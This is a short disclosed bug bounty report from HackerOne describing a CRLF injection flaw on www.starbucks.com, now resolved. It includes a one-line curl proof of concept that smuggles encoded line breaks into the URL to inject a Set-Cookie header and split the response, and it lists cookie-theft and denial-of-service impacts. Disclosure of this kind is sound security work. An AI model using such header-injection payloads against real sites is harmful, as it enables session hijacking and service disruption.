CRLF injection on www.starbucks.com

Disclosed: 2020-09-01 21:59:31 By x3n0nn3p To starbucks
Medium
Vulnerability Details
The vulnerability allows setting arbitrary headers, and also enables response splitting which can then be exploited further. POC: curl -i 'https://www.starbucks.com/email-prospecttg9wh%0d%0aset-cookie:foo%0d%0a%0d%0a4t6uf?requesturl=/responsibility/global-report/policies' -d 'newsletter_signup_email=&newsletter_signup_zipcode=&newsletter_placement=footer' --http1.1 Screenshot Attached. Regards ## Impact ### Impact Possible impacts include; - Stealing authenticated information via Ajax request with injected CORS headers - Application DOS using overly long Cookies, etc.
Actions
View on HackerOne
Report Stats
  • Report ID: 858650
  • State: Closed
  • Substate: resolved
  • Upvotes: 32
Share this report